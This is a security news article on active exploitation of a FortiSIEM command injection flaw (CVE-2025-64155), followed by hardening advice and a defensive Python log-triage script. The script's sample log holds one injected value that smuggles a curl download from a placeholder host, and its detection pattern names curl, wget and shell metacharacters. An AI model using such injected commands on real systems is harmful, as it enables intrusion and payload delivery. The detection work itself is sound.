Fortinet Warns of Active FortiSIEM RCE Exploitation

Fortinet warns CVE-2025-64155 is actively exploited for unauthenticated RCE on on-prem FortiSIEM via TCP 7900.

Written By Ken Underhill
Jan 16, 2026

A Fortinet FortiSIEM vulnerability is under active exploitation, giving attackers a direct path to remote code execution on a core enterprise monitoring platform.

The flaw “… may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests,” said Fortinet in its advisory.

How CVE-2025-64155 Works

CVE-2025-64155 is an OS command injection vulnerability in FortiSIEM’s phMonitor service, a component used for internal communication and data exchange between Super and Worker nodes. 

The flaw stems from improper neutralization of special characters in OS command handling, which allows attacker-controlled input to be interpreted as part of a system-level command. 

Attackers exploit the bug by sending crafted TCP requests to port 7900, targeting storage configuration endpoints that accept an elastic type parameter. 

Defused researchers observed payloads that are intentionally formatted to resemble legitimate elastic storage configurations — using XML fields such as cluster names and replica settings — so the traffic blends in with expected administrative workflows. 

The malicious input is then injected into a backend curl command, enabling attackers to write arbitrary files to disk under the admin user context.

From there, the attack can escalate quickly. Defused reported that attackers can chain the initial file-write capability into root-level compromise by overwriting binaries or files that are later executed by privileged processes.

With full control of a FortiSIEM node, an adversary can potentially tamper with logs, disrupt alerting, or use the SIEM’s network position to pivot deeper into the environment. 

Public proof-of-concept exploit code is already available on GitHub.

Fortinet noted that FortiSIEM Cloud and Collector nodes are not affected, but vulnerable on-prem Super and Worker nodes remain exposed if they are reachable over the network. 

Fortinet has released updates to address the issue, and organizations should apply them immediately.

What Security Teams Should Do Now

With CVE-2025-64155 under active exploitation, security teams should assume exposed systems will be probed quickly and prioritize containment alongside patching. 

Because SIEM platforms sit in high-trust positions, a single compromised node can become a launch point for log tampering, data theft, and lateral movement. 

  • Upgrade FortiSIEM Super and Worker nodes to fixed releases and migrate off affected 6.7.x and 7.0.x builds immediately.
  • Block internet exposure of TCP 7900 and restrict access to only required FortiSIEM nodes using strict allowlists and layered firewall controls.
  • Segment FortiSIEM into a dedicated security management network and limit admin access via jump hosts, MFA, and least-privilege controls.
  • Apply egress filtering on FortiSIEM nodes to prevent second-stage payload retrieval, command-and-control traffic, and data exfiltration.
  • Monitor /opt/phoenix/log/phoenix.log for PHL_ERROR indicators and hunt for unusual outbound connections, file writes, and binary tampering behavior.
  • Enable file integrity monitoring and alert on suspicious process execution (e.g., curl, shells, wget) originating from phMonitor or Phoenix service contexts.
  • Test and rehearse incident response playbooks for SIEM compromise to ensure rapid containment during active exploitation.
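The log-hunting step above can be scripted. This is an added example, not Fortinet's or Defused's code: it triages constructed phoenix.log-style lines, flagging PHL_ERROR entries raised by phMonitor and, at higher severity, storage-configuration input that carries shell metacharacters or download tools. The line layout (timestamp, level, component, message) is an assumption for illustration, not the documented phoenix.log format.

```python
import re
from typing import Dict, List

# Constructed sample excerpt; the layout is an assumed illustration, not the
# real phoenix.log format. Host 198.51.100.7 is a documentation-range placeholder.
SAMPLE_LOG = """\
2026-01-16 10:01:02 PHL_INFO phMonitor storage config type=elastic cluster=prod-es replicas=1
2026-01-16 10:01:03 PHL_ERROR phMonitor storage config type=elastic cluster=prod-es replicas=x
2026-01-16 10:01:09 PHL_ERROR phMonitor storage config type=elastic cluster=a;curl http://198.51.100.7/p -o /tmp/p replicas=1
2026-01-16 10:02:10 PHL_INFO phMonitor heartbeat from worker-2
2026-01-16 10:03:44 PHL_ERROR phDataManager disk quota exceeded on /data
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<level>PHL_[A-Z]+) (?P<comp>\S+) (?P<msg>.*)$")
# Tokens that never belong in a cluster name or replica count but are exactly
# what an OS command injection into a backend curl invocation relies on.
META_RE = re.compile(r"[;&|`]|\$\(|\b(curl|wget)\b")


def triage(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious line: timestamp, severity, reasons, raw line."""
    findings: List[Dict[str, str]] = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # unparsable line: leave it for manual review
        reasons: List[str] = []
        msg = m["msg"]
        is_storage = "storage config" in msg or "elastic" in msg
        if m["level"] == "PHL_ERROR" and m["comp"] == "phMonitor":
            reasons.append("PHL_ERROR raised by phMonitor")
        injected = bool(is_storage and META_RE.search(msg))
        if injected:
            reasons.append("shell metacharacters or download tool in storage config input")
        if reasons:
            findings.append({
                "ts": m["ts"],
                "severity": "high" if injected else "medium",
                "reasons": "; ".join(reasons),
                "line": raw,
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ts']} {f['reasons']}")
```

Point the script at the real file with `triage(open("/opt/phoenix/log/phoenix.log").read())` once the regex is adjusted to the actual line layout on your nodes.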

These steps help harden FortiSIEM deployments and reduce the blast radius in the event of compromise. 

CVE-2025-64155 is a reminder that attackers increasingly target the security tools organizations rely on for visibility and response. 

When a SIEM is compromised, defenders risk losing trusted telemetry, missing active intrusions, and giving adversaries a privileged foothold to expand deeper into the environment. 

This risk of trusted tool compromise is why organizations are turning to zero-trust solutions to reduce implicit trust and limit attacker movement.

Ken Underhill

Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.
